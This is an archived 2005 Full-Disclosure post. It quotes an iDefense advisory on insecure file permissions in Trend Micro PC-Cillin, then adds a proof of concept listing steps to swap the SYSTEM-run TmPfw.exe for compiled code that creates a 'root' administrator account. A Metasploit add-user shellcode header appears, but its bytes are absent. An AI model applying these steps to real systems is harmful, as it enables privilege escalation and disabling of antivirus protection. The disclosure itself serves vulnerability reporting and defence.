[Full-disclosure] iDefense Security Advisory 12.14.05: Trend Micro PC-Cillin Internet Security Insecure File Permission Vulnerability
gerhard.wagner at fh-hagenberg.at
Tue Dec 27 11:04:35 GMT 2005
labs-no-reply at idefense.com wrote:
> Trend Micro PC-Cillin Internet Security Insecure File Permission
> iDefense Security Advisory 12.14.05
> December 14, 2005
> I. BACKGROUND
> Trend Micro PC-Cillin Internet Security is antivirus protection software
> for home and business use. It provides complete protection, detection
> and elimination of thousands of computer viruses, worms, and Trojan
> Horse programs.
> II. DESCRIPTION
> Local exploitation of an insecure permission vulnerability in multiple
> Trend Micro Inc. products allows attackers to escalate privileges or
> disable protection.
> The vulnerabilities specifically exist in the default Access Control
> List (ACL) settings that are applied during installation. When an
> administrator installs an affected Trend Micro product, the default ACL
> allows any user to modify the installed files. Due to the fact that some
> of the programs run as system services, a user could replace an
> installed Trend Micro product file with their own malicious code, and
> the code would be executed with system privileges.
> III. ANALYSIS
> Successful exploitation allows local attackers to escalate privileges to
> the system level. It is also possible to use this vulnerability to
> simply disable protection by moving all of the executable files so that
> they cannot start upon a reboot. Once disabled, the products are no
> longer able to provide threat mitigation, thus opening the machine up to
> IV. DETECTION
> iDefense has confirmed the existence of this vulnerability in Trend
> Micro PC-Cillin Internet Security 2005 version 12.00 build 1244. It is
> suspected that previous versions are also vulnerable. It has been
> reported that InterScan VirusWall, InterScan eManager and Office Scan
> are also vulnerable.
> V. WORKAROUND
> Apply proper Access Control List settings to the directory that the
> affected Trend Micro product is installed in. The ACL rules be set so
> that no regular users can modify files in the directory.
> VI. VENDOR RESPONSE
> "Trend Micro has become aware of a vulnerability related to PC-CILLIN
> 12. PC-cillin12 does not work correctly when configuration file and the
> registry are erased intentionally.
> We will release PC-cillin12.4 in December 14, 2005 by AU server. This
> release will be included short term solution of changing ACL to User
> authority for configuration file and registry.
> We will create a tool for changing ACL to User authority for
> configuration file and registry.
> This tool can be used for both PC-cillin12 and PC-cillin14 as a same
> VII. CVE INFORMATION
> The Common Vulnerabilities and Exposures (CVE) project has assigned the
> name CVE-2005-3360 to this issue. This is a candidate for inclusion in
> the CVE list (http://cve.mitre.org), which standardizes names for
> security problems.
> VIII. DISCLOSURE TIMELINE
> 10/27/2005 Initial vendor notification
> 10/27/2005 Initial vendor response
> 12/14/2005 Public disclosure
> IX. CREDIT
> The discoverer of this vulnerability wishes to remain anonymous.
> Get paid for vulnerability research
> X. LEGAL NOTICES
> Copyright © 2005 iDefense, Inc.
> Permission is granted for the redistribution of this alert
> electronically. It may not be edited in any way without the express
> written consent of iDefense. If you wish to reprint the whole or any
> part of this alert in any other medium other than electronically, please
> email customerservice at iDefense.com for permission.
> Disclaimer: The information in the advisory is believed to be accurate
> at the time of publishing based on currently available information. Use
> of the information constitutes acceptance for use in an AS IS condition.
> There are no warranties with regard to this information. Neither the
> author nor the publisher accepts any liability for any direct, indirect,
> or consequential loss or damage arising from use of, or reliance on,
> this information.
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
* by Team W00dp3ck3r:
* frauk\x41iser, mag00n and s00n
* Advisory: www.idefense.com/application/poi/display?id=351&type=vulnerabilities
* Tested on Windows XP Service Pack 2 english
* Version affected PC-cillin Internet Security 2006
* Status: currently no patch has been provided (19.12.2005)
* Follow the instructions to gain administrative privileges:
* 1.) Default Installation (can only be accomplished as Administrator).
* 2.) Login is as restricted user.
* 3.) Compile the c code provided at the bottom of this document.
* 4.) Right click on the Trend Micro icon in the taskbar and shut down Trend Micro
* (Seems that Trend has forgotten that normal users should not be able to
* shutdown an antivirus service).
* 5.) Fire up your favorite editor and open the previous compiled exe (we recommend
* UltraEdit) and also open TmPfw.exe which is located in the default installation
* directory of your Trend Micro installation.
* 6.) First copy the content of the TmPfw.exe into a blank document and save it.
* We will need it later, when we want to repair the service.
* 7.) Now replace the content of the TmPfw.exe file with the content of the self
* compiled executable.
* Note: It is really important to alter the content of the TmPfw.exe file. If you
* just change the filename of the created executable and then replace the
* file, the initial rights which are set during the installation would be lost.
* The TmPfw.exe file is executed with SYSTEM rights during startup process of
* Windows and it's under our control, because Trend Micro really messed up with
* the permissions.
* 8.) Restart the pccmain.exe and if you type net user in your command shell you will
* notice a user with administrative rights called root.
* 9.) Finally open the editor again and restore the content of the TmPfw.exe. Now
* Trend Micro works again without complaining.
/* win32_adduser - PASS=root EXITFUNC=thread USER=root Size=232
* Encoder=PexFnstenvSub http://metasploit.com */
unsigned char shellcode =
Full-Disclosure is hosted and sponsored by Secunia.